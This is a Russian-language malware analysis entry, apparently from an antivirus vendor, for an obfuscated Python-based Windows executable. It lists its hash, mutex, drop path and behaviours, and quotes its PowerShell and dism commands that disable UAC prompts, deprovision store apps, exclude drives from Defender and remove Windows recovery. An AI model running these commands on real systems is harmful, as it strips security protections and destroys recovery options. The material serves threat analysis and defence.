sha1:
- 2dd31bf4813dc0e273fa5210c442d68876002f28
Описание
Вредосносный исполняемый файл для ОС Windows, написанный на Python и скомпилированный PyInstaller. Обфусцирован BlankOBF v2. Распаковывается на скомпрометированной системе дроппером Python.Muldrop.39 (fd7eee537605618826ed7dd236948964faa2252f) и сохраняется по пути C:\ProgramData\setup.exe.
Принцип действия
-
При запуске создает мьютекс Global\jokerdnr
-
Совершает попытку выполнения с привилегиями администратора
-
Отключает уведомления Windows
-
Добавляет все диски в список исключения Windows Defender
-
Отключает уведомления UAC для запуска исполняемых файлов с правами администратора
"Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'ConsentPromptBehaviorAdmin' -Value 0" -
а) Добавляет все установленные пакеты подписанного приложения (*.msix, *.appx) в список невозвращаемых после удаления
$store = \'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Appx\\AppxAllUserStore\'
$appxpackage = Get-AppxPackage -AllUsers
$PackageFamilyName = ($appxpackage | Where-Object { $_.Name -eq $appx.DisplayName }).PackageFamilyName
New-Item -Path "$store\\Deprovisioned\\$PackageFamilyName" -Force | Out-Nullб) Вносит приложения в список EndOfLife, которое не позволяет им устанавливаться. Устанавливает пакетам приложений флаг о возможности удаления.
dism /online /set-nonremovableapppolicy /packagefamily:$($appx.PackageFamilyName) /nonremovable:0 | Out-Nullв) Запрещает этим приложениям возвращаться, после обновления Windows.
-
Отключает среду восстановления Windows
-
Удаляет файлы восстановления Windows